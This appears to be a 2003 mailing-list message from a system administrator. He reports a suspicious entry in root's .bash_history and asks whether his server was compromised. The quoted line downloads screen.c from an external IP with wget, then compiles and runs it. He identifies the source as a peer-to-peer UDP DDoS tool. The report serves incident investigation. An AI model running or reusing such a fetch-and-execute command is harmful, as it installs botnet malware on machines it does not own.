On Thu, 2003-04-24 at 15:45, Matt Stamm wrote:
Gideon,
I checked .bash_history as you suggested and found and interesting entry. This entry was in .bash_history in the 'root' directory.
cd /var/tmp;if [ -f screen.c ];then(exit);fi;wget -O screen.c wget http://64.5.4.47/screen.c;export PATH=.:/usr/bin:$PATH;gcc -o screen screen.c -DEXTERNAL_BASE="\"64.5.4.47\"";screen;exit;
I'm new at this but based on a little research am I correct in assuming an external someone downloaded screen.c into my /var/tmp directory, compiled it to /usr/bin and then ran it. Is this correct? I looked at the source for 'screen.c' and in the title it says...
Peer-to-peer UDP Distributed Denial of Service (PUD) by contem
Does look good does it? Is anyone familiar with this?
The IP points to "dailygrind.pciwest.net"